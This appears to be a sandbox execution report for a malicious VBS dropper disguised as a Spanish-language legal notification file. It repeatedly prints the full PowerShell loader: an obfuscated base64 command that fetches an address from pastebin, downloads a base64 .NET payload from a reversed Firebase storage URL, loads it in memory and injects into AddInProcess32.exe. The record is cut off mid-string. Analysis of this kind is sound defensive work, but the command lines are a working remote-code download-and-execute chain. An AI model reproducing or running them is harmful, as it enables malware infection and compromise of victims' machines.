C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5428 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:884
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:5580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2240
-
-
-
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs1⤵
- Opens file in notepad (likely ransom note)
PID:5492
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:4732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:3280
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5716
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2456 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5236
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:5272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9